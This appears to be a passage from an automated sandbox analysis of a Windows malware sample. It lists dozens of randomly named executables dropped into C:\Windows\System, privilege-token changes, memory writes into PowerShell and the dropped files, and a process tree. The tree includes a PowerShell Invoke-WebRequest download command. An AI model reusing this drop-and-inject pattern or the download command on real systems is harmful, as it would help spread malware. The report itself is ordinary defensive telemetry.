File created C:\Windows\System\QEfiCth.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\yaonnFA.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\uYVGRiR.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\HxHBovv.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\NgftZAn.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\LjAfMMc.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\WvNGBfW.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\uYypNgr.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\VcvboUb.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\UBtLzRI.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\kCMZsBn.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\jpSFrQv.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\jjEipvd.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\eZMsJwc.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
File created C:\Windows\System\VHNUMUL.exe C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3112 wrote to memory of 4292 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3112 wrote to memory of 4292 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3112 wrote to memory of 4576 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\pXSoYZz.exe
PID 3112 wrote to memory of 4576 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\pXSoYZz.exe
PID 3112 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\vZkSTFH.exe
PID 3112 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\vZkSTFH.exe
PID 3112 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\qBRtaYh.exe
PID 3112 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\qBRtaYh.exe
PID 3112 wrote to memory of 3708 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\OaEkGuw.exe
PID 3112 wrote to memory of 3708 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\OaEkGuw.exe
PID 3112 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\qerrWAq.exe
PID 3112 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\qerrWAq.exe
PID 3112 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\qYoPpGV.exe
PID 3112 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\qYoPpGV.exe
PID 3112 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\aUlFtTb.exe
PID 3112 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\aUlFtTb.exe
PID 3112 wrote to memory of 1292 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\WfNyiIg.exe
PID 3112 wrote to memory of 1292 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\WfNyiIg.exe
PID 3112 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\uYVGRiR.exe
PID 3112 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\uYVGRiR.exe
PID 3112 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\QcpeRow.exe
PID 3112 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\QcpeRow.exe
PID 3112 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\wVwzWGE.exe
PID 3112 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\wVwzWGE.exe
PID 3112 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\osZTcHW.exe
PID 3112 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\osZTcHW.exe
PID 3112 wrote to memory of 3216 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\QSflFyD.exe
PID 3112 wrote to memory of 3216 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\QSflFyD.exe
PID 3112 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\hIcBbjX.exe
PID 3112 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\hIcBbjX.exe
PID 3112 wrote to memory of 3700 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\wpejEsJ.exe
PID 3112 wrote to memory of 3700 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\wpejEsJ.exe
PID 3112 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\FOEFUBv.exe
PID 3112 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\FOEFUBv.exe
PID 3112 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\oJsrytP.exe
PID 3112 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\oJsrytP.exe
PID 3112 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\sxrCPjT.exe
PID 3112 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\sxrCPjT.exe
PID 3112 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\kkRNIDH.exe
PID 3112 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\kkRNIDH.exe
PID 3112 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\ioHcfky.exe
PID 3112 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\ioHcfky.exe
PID 3112 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\ywqOfnx.exe
PID 3112 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\ywqOfnx.exe
PID 3112 wrote to memory of 4964 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\eVRYZnG.exe
PID 3112 wrote to memory of 4964 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\eVRYZnG.exe
PID 3112 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\OALhLOE.exe
PID 3112 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\OALhLOE.exe
PID 3112 wrote to memory of 3200 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\njshNOE.exe
PID 3112 wrote to memory of 3200 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\njshNOE.exe
PID 3112 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\ZvvUIkk.exe
PID 3112 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\ZvvUIkk.exe
PID 3112 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\BuCvjyN.exe
PID 3112 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\BuCvjyN.exe
PID 3112 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\yhJwsGc.exe
PID 3112 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\yhJwsGc.exe
PID 3112 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\onknRvH.exe
PID 3112 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\onknRvH.exe
PID 3112 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\ayjxpqf.exe
PID 3112 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\ayjxpqf.exe
PID 3112 wrote to memory of 2420 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\HThQyoT.exe
PID 3112 wrote to memory of 2420 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\HThQyoT.exe
PID 3112 wrote to memory of 4548 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\DYNxzJK.exe
PID 3112 wrote to memory of 4548 N/A C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe C:\Windows\System\DYNxzJK.exe

Processes

C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\28c1e474e1752913c3eed41776259930_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\pXSoYZz.exe

C:\Windows\System\pXSoYZz.exe

C:\Windows\System\vZkSTFH.exe

C:\Windows\System\vZkSTFH.exe

C:\Windows\System\qBRtaYh.exe

C:\Windows\System\qBRtaYh.exe

C:\Windows\System\OaEkGuw.exe

C:\Windows\System\OaEkGuw.exe

C:\Windows\System\qerrWAq.exe

C:\Windows\System\qerrWAq.exe

C:\Windows\System\qYoPpGV.exe

C:\Windows\System\qYoPpGV.exe

C:\Windows\System\aUlFtTb.exe

C:\Windows\System\aUlFtTb.exe

C:\Windows\System\WfNyiIg.exe

C:\Windows\System\WfNyiIg.exe

C:\Windows\System\uYVGRiR.exe

C:\Windows\System\uYVGRiR.exe

C:\Windows\System\QcpeRow.exe

C:\Windows\System\QcpeRow.exe

C:\Windows\System\wVwzWGE.exe

C:\Windows\System\wVwzWGE.exe

C:\Windows\System\osZTcHW.exe

C:\Windows\System\osZTcHW.exe

C:\Windows\System\QSflFyD.exe

C:\Windows\System\QSflFyD.exe

C:\Windows\System\hIcBbjX.exe

C:\Windows\System\hIcBbjX.exe

C:\Windows\System\wpejEsJ.exe

C:\Windows\System\wpejEsJ.exe

C:\Windows\System\FOEFUBv.exe

C:\Windows\System\FOEFUBv.exe

C:\Windows\System\oJsrytP.exe

C:\Windows\System\oJsrytP.exe

C:\Windows\System\sxrCPjT.exe

C:\Windows\System\sxrCPjT.exe

C:\Windows\System\kkRNIDH.exe

C:\Windows\System\kkRNIDH.exe

C:\Windows\System\ioHcfky.exe

C:\Windows\System\ioHcfky.exe

C:\Windows\System\ywqOfnx.exe

C:\Windows\System\ywqOfnx.exe

C:\Windows\System\eVRYZnG.exe

C:\Windows\System\eVRYZnG.exe

C:\Windows\System\OALhLOE.exe

C:\Windows\System\OALhLOE.exe

C:\Windows\System\njshNOE.exe

C:\Windows\System\njshNOE.exe

C:\Windows\System\ZvvUIkk.exe

C:\Windows\System\ZvvUIkk.exe

C:\Windows\System\BuCvjyN.exe

C:\Windows\System\BuCvjyN.exe

C:\Windows\System\yhJwsGc.exe

C:\Windows\System\yhJwsGc.exe

C:\Windows\System\onknRvH.exe

C:\Windows\System\onknRvH.exe

C:\Windows\System\ayjxpqf.exe

C:\Windows\System\ayjxpqf.exe

C:\Windows\System\HThQyoT.exe

C:\Windows\System\HThQyoT.exe

C:\Windows\System\DYNxzJK.exe

C:\Windows\System\DYNxzJK.exe

C:\Windows\System\yfpynUr.exe

C:\Windows\System\yfpynUr.exe

C:\Windows\System\ZcOcYqB.exe

C:\Windows\System\ZcOcYqB.exe

C:\Windows\System\eWHziDz.exe

C:\Windows\System\eWHziDz.exe

C:\Windows\System\uLQqzMA.exe

C:\Windows\System\uLQqzMA.exe

C:\Windows\System\BuyXkLY.exe

C:\Windows\System\BuyXkLY.exe

C:\Windows\System\TkzhEyW.exe

C:\Windows\System\TkzhEyW.exe

C:\Windows\System\FHcqNtk.exe

C:\Windows\System\FHcqNtk.exe

C:\Windows\System\tyMgZVL.exe

C:\Windows\System\tyMgZVL.exe

C:\Windows\System\wZDMmNI.exe

C:\Windows\System\wZDMmNI.exe

C:\Windows\System\xKcwMjq.exe

C:\Windows\System\xKcwMjq.exe

C:\Windows\System\cNrTNlQ.exe

C:\Windows\System\cNrTNlQ.exe

C:\Windows\System\FDrzNCv.exe

C:\Windows\System\FDrzNCv.exe

C:\Windows\System\qtRDnhb.exe

C:\Windows\System\qtRDnhb.exe

C:\Windows\System\TPwRdWY.exe

C:\Windows\System\TPwRdWY.exe

C:\Windows\System\CQdqjpb.exe

C:\Windows\System\CQdqjpb.exe

C:\Windows\System\YvmTsDd.exe

C:\Windows\System\YvmTsDd.exe

C:\Windows\System\qhMoLjq.exe

C:\Windows\System\qhMoLjq.exe

C:\Windows\System\EBNmXNG.exe

C:\Windows\System\EBNmXNG.exe

C:\Windows\System\HlzymDa.exe

C:\Windows\System\HlzymDa.exe

C:\Windows\System\RyEbOmJ.exe

C:\Windows\System\RyEbOmJ.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4244,i,13035806169561352434,1332896185314862791,262144 --variations-seed-version --mojo-platform-channel-handle=4124 /prefetch:8

C:\Windows\System\mwoSuOn.exe

C:\Windows\System\mwoSuOn.exe

C:\Windows\System\Npsbsad.exe

C:\Windows\System\Npsbsad.exe

C:\Windows\System\pcLROOO.exe

C:\Windows\System\pcLROOO.exe

C:\Windows\System\zKeomja.exe

C:\Windows\System\zKeomja.exe

C:\Windows\System\NvKDWaX.exe

C:\Windows\System\NvKDWaX.exe

C:\Windows\System\ZPkfLut.exe

C:\Windows\System\ZPkfLut.exe

C:\Windows\System\rUtPhvs.exe

C:\Windows\System\rUtPhvs.exe

C:\Windows\System\Ispnnpr.exe

C:\Windows\System\Ispnnpr.exe

C:\Windows\System\zfGbBaD.exe

C:\Windows\System\zfGbBaD.exe

C:\Windows\System\RBopSjv.exe

C:\Windows\System\RBopSjv.exe

C:\Windows\System\msHQlOJ.exe

C:\Windows\System\msHQlOJ.exe

C:\Windows\System\DFXvzPW.exe

C:\Windows\System\DFXvzPW.exe

C:\Windows\System\cAfsQcJ.exe

C:\Windows\System\cAfsQcJ.exe

C:\Windows\System\ehSeTeE.exe

C:\Windows\System\ehSeTeE.exe

C:\Windows\System\XmMUfCl.exe

C:\Windows\System\XmMUfCl.exe

C:\Windows\System\ksLnuxA.exe

C:\Windows\System\ksLnuxA.exe

C:\Windows\System\RNlYErZ.exe

C:\Windows\System\RNlYErZ.exe

C:\Windows\System\UYbncGa.exe

C:\Windows\System\UYbncGa.exe

C:\Windows\System\WCJSUEI.exe

C:\Windows\System\WCJSUEI.exe

C:\Windows\System\kTHBasS.exe

C:\Windows\System\kTHBasS.exe

C:\Windows\System\unVVPBk.exe

C:\Windows\System\unVVPBk.exe

C:\Windows\System\LiYVpnt.exe

C:\Windows\System\LiYVpnt.exe

C:\Windows\System\jgnaVsH.exe

C:\Windows\System\jgnaVsH.exe

C:\Windows\System\LndTMlM.exe

C:\Windows\System\LndTMlM.exe

C:\Windows\System\MiQkMMn.exe

C:\Windows\System\MiQkMMn.exe

C:\Windows\System\TuSqASg.exe

C:\Windows\System\TuSqASg.exe

C:\Windows\System\IBItdjs.exe

C:\Windows\System\IBItdjs.exe

C:\Windows\System\EKIjHLJ.exe

C:\Windows\System\EKIjHLJ.exe

C:\Windows\System\lIaYuzz.exe

C:\Windows\System\lIaYuzz.exe

C:\Windows\System\rUphkCz.exe

C:\Windows\System\rUphkCz.exe

C:\Windows\System\fdKFOec.exe

C:\Windows\System\fdKFOec.exe

C:\Windows\System\XUTjlPq.exe

C:\Windows\System\XUTjlPq.exe

C:\Windows\System\FxgJGzr.exe

C:\Windows\System\FxgJGzr.exe

C:\Windows\System\OZzisqL.exe

C:\Windows\System\OZzisqL.exe

C:\Windows\System\IZAjjBk.exe

C:\Windows\System\IZAjjBk.exe

C:\Windows\System\HxHBovv.exe

C:\Windows\System\HxHBovv.exe

C:\Windows\System\heyuaqj.exe

C:\Windows\System\heyuaqj.exe

C:\Windows\System\JzJncxz.exe

C:\Windows\System\JzJncxz.exe

C:\Windows\System\hucmIAn.exe

C:\Windows\System\hucmIAn.exe

C:\Windows\System\tDmrGDM.exe

C:\Windows\System\tDmrGDM.exe

C:\Windows\System\UXpLMjy.exe

C:\Windows\System\UXpLMjy.exe

C:\Windows\System\sZgwPHP.exe

C:\Windows\System\sZgwPHP.exe

C:\Windows\System\lTkMlRj.exe

C:\Windows\System\lTkMlRj.exe

C:\Windows\System\ReunZjo.exe

C:\Windows\System\ReunZjo.exe

C:\Windows\System\jqUdrzM.exe

C:\Windows\System\jqUdrzM.exe

C:\Windows\System\wmveEZl.exe

C:\Windows\System\wmveEZl.exe

C:\Windows\System\yfSSayF.exe

C:\Windows\System\yfSSayF.exe

C:\Windows\System\QOQBcKF.exe

C:\Windows\System\QOQBcKF.exe

C:\Windows\System\XgYziJP.exe

C:\Windows\System\XgYziJP.exe

C:\Windows\System\PRwsBPo.exe

C:\Windows\System\PRwsBPo.exe

C:\Windows\System\hJjBogC.exe

C:\Windows\System\hJjBogC.exe

C:\Windows\System\bTlDgty.exe

C:\Windows\System\bTlDgty.exe

C:\Windows\System\LOCsBcQ.exe

C:\Windows\System\LOCsBcQ.exe

C:\Windows\System\zaupNCG.exe

C:\Windows\System\zaupNCG.exe

C:\Windows\System\CXuPEwA.exe

C:\Windows\System\CXuPEwA.exe

C:\Windows\System\mLMyWng.exe

C:\Windows\System\mLMyWng.exe

C:\Windows\System\zJmShIv.exe

C:\Windows\System\zJmShIv.exe

C:\Windows\System\pcFzhOp.exe

C:\Windows\System\pcFzhOp.exe

C:\Windows\System\GgUHDYD.exe

C:\Windows\System\GgUHDYD.exe

C:\Windows\System\DEiDLiH.exe

C:\Windows\System\DEiDLiH.exe

C:\Windows\System\fhWlYhT.exe

C:\Windows\System\fhWlYhT.exe

C:\Windows\System\OMwLNDs.exe

C:\Windows\System\OMwLNDs.exe

C:\Windows\System\mxsPKTe.exe

C:\Windows\System\mxsPKTe.exe

C:\Windows\System\YqJNMfL.exe

C:\Windows\System\YqJNMfL.exe

C:\Windows\System\ARHjBtm.exe

C:\Windows\System\ARHjBtm.exe

C:\Windows\System\DcdvbYY.exe

C:\Windows\System\DcdvbYY.exe

C:\Windows\System\TvfgYEp.exe

C:\Windows\System\TvfgYEp.exe

C:\Windows\System\BJJmNrN.exe

C:\Windows\System\BJJmNrN.exe

C:\Windows\System\bkfYAfF.exe

C:\Windows\System\bkfYAfF.exe

C:\Windows\System\iBxIxCM.exe

C:\Windows\System\iBxIxCM.exe

C:\Windows\System\YWXhcJT.exe

C:\Windows\System\YWXhcJT.exe

C:\Windows\System\RRqZUSD.exe

C:\Windows\System\RRqZUSD.exe

C:\Windows\System\XUSSLhH.exe

C:\Windows\System\XUSSLhH.exe

C:\Windows\System\zFvxBqq.exe

C:\Windows\System\zFvxBqq.exe

C:\Windows\System\ZJphtBB.exe

C:\Windows\System\ZJphtBB.exe

C:\Windows\System\cCpShlG.exe

C:\Windows\System\cCpShlG.exe

C:\Windows\System\LWCejaA.exe

C:\Windows\System\LWCejaA.exe

C:\Windows\System\sPwoHpG.exe

C:\Windows\System\sPwoHpG.exe

C:\Windows\System\GLJUcLy.exe

C:\Windows\System\GLJUcLy.exe

C:\Windows\System\twqjEIc.exe

C:\Windows\System\twqjEIc.exe

C:\Windows\System\CzlsmCC.exe

C:\Windows\System\CzlsmCC.exe

C:\Windows\System\SvYxMUK.exe

C:\Windows\System\SvYxMUK.exe

C:\Windows\System\YUJGbHQ.exe

C:\Windows\System\YUJGbHQ.exe

C:\Windows\System\DpHCLqT.exe

C:\Windows\System\DpHCLqT.exe

C:\Windows\System\NdatzCv.exe

C:\Windows\System\NdatzCv.exe

C:\Windows\System\RIGtphx.exe

C:\Windows\System\RIGtphx.exe

C:\Windows\System\LFiBaPE.exe

C:\Windows\System\LFiBaPE.exe

C:\Windows\System\Hpzlweq.exe

C:\Windows\System\Hpzlweq.exe

C:\Windows\System\CztAvJU.exe

C:\Windows\System\CztAvJU.exe

C:\Windows\System\VctNkkX.exe

C:\Windows\System\VctNkkX.exe

C:\Windows\System\RiGpXFt.exe

C:\Windows\System\RiGpXFt.exe

C:\Windows\System\FPOieeh.exe

C:\Windows\System\FPOieeh.exe

C:\Windows\System\kKEEFQO.exe

C:\Windows\System\kKEEFQO.exe

C:\Windows\System\oeNWGAI.exe

C:\Windows\System\oeNWGAI.exe

C:\Windows\System\FmJfOQM.exe

C:\Windows\System\FmJfOQM.exe

C:\Windows\System\ZdSLIuH.exe

C:\Windows\System\ZdSLIuH.exe

C:\Windows\System\OiEConR.exe

C:\Windows\System\OiEConR.exe

C:\Windows\System\myxVqQQ.exe

C:\Windows\System\myxVqQQ.exe

C:\Windows\System\hfmJtLK.exe

C:\Windows\System\hfmJtLK.exe

C:\Windows\System\iJlixVS.exe

C:\Windows\System\iJlixVS.exe

C:\Windows\System\QzxIxYR.exe

C:\Windows\System\QzxIxYR.exe

C:\Windows\System\LmxXLoq.exe

C:\Windows\System\LmxXLoq.exe

C:\Windows\System\ocGTmmQ.exe

C:\Windows\System\ocGTmmQ.exe

C:\Windows\System\gWrciDq.exe

C:\Windows\System\gWrciDq.exe

C:\Windows\System\xiIIkBm.exe

C:\Windows\System\xiIIkBm.exe

C:\Windows\System\hWNdvXp.exe

C:\Windows\System\hWNdvXp.exe

C:\Windows\System\uuZUaOX.exe

C:\Windows\System\uuZUaOX.exe

C:\Windows\System\BTxWfeC.exe

C:\Windows\System\BTxWfeC.exe

C:\Windows\System\MHkGRhs.exe

C:\Windows\System\MHkGRhs.exe

C:\Windows\System\ZPqBHQx.exe

C:\Windows\System\ZPqBHQx.exe

C:\Windows\System\FtNXsQV.exe

C:\Windows\System\FtNXsQV.exe

C:\Windows\System\pjtyvzx.exe

C:\Windows\System\pjtyvzx.exe

C:\Windows\System\OmuLflb.exe

C:\Windows\System\OmuLflb.exe

C:\Windows\System\eDlmIgM.exe

C:\Windows\System\eDlmIgM.exe

C:\Windows\System\BrwJjcw.exe

C:\Windows\System\BrwJjcw.exe

C:\Windows\System\AeURmdH.exe

C:\Windows\System\AeURmdH.exe

C:\Windows\System\vYlxlDm.exe

C:\Windows\System\vYlxlDm.exe

C:\Windows\System\WaffHLm.exe

C:\Windows\System\WaffHLm.exe

C:\Windows\System\vStUATm.exe

C:\Windows\System\vStUATm.exe

C:\Windows\System\AdTQMUY.exe

C:\Windows\System\AdTQMUY.exe

C:\Windows\System\usnUyoU.exe

C:\Windows\System\usnUyoU.exe

C:\Windows\System\YeabWaA.exe

C:\Windows\System\YeabWaA.exe

C:\Windows\System\XuqtvEA.exe

C:\Windows\System\XuqtvEA.exe

C:\Windows\System\TQhCOyF.exe

C:\Windows\System\TQhCOyF.exe

C:\Windows\System\wWINmWL.exe

C:\Windows\System\wWINmWL.exe

C:\Windows\System\qWthvte.exe

C:\Windows\System\qWthvte.exe

C:\Windows\System\EORBXPx.exe

C:\Windows\System\EORBXPx.exe

C:\Windows\System\SciikEA.exe

C:\Windows\System\SciikEA.exe

C:\Windows\System\spHoUpK.exe

C:\Windows\System\spHoUpK.exe

C:\Windows\System\QEXFQGW.exe

C:\Windows\System\QEXFQGW.exe

C:\Windows\System\alyHxPW.exe

C:\Windows\System\alyHxPW.exe

C:\Windows\System\tWnxDEJ.exe

C:\Windows\System\tWnxDEJ.exe

C:\Windows\System\txVkIfe.exe

C:\Windows\System\txVkIfe.exe

C:\Windows\System\tqNaibc.exe

C:\Windows\System\tqNaibc.exe

C:\Windows\System\eidJxuJ.exe

C:\Windows\System\eidJxuJ.exe

C:\Windows\System\KWDtbSj.exe

C:\Windows\System\KWDtbSj.exe

C:\Windows\System\JFhpYBA.exe

C:\Windows\System\JFhpYBA.exe

